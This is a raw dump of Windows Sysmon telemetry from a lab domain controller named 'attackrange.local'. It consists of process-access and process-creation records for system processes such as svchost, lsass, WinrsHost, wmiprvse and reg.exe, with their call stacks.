10:40:53.156{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002701Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.156{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002700Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.156{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002699Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.156{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E35-5F80-7F00-000000007F01}5064C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002698Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.156{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E35-5F80-7F00-000000007F01}5064C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002697Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.163{733EE690-3E35-5F80-7F00-000000007F01}5064C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{733EE690-3E35-5F80-A1DB-040000000000}0x4dba10HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{733EE690-3DF9-5F80-0C00-000000007F01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002696Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.156{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002695Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.156{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002694Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:53.156{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002835Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.637{733EE690-3DF9-5F80-1000-000000007F01}11324764C:\Windows\system32\svchost.exe{733EE690-3E36-5F80-8900-000000007F01}4476C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002834Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.622{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E36-5F80-8900-000000007F01}4476C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002833Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.622{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E36-5F80-8900-000000007F01}4476C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002832Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.622{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E36-5F80-8900-000000007F01}4476C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002831Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.575{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002830Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.575{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002829Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.575{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002828Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.466{733EE690-3E36-5F80-8600-000000007F01}40844428C:\Windows\system32\conhost.exe{733EE690-3E36-5F80-8800-000000007F01}4452C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002827Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.466{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002826Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.466{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002825Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.466{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002824Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.466{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002823Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.466{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002822Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.450{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002821Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.450{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002820Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.450{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002819Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.450{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002818Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 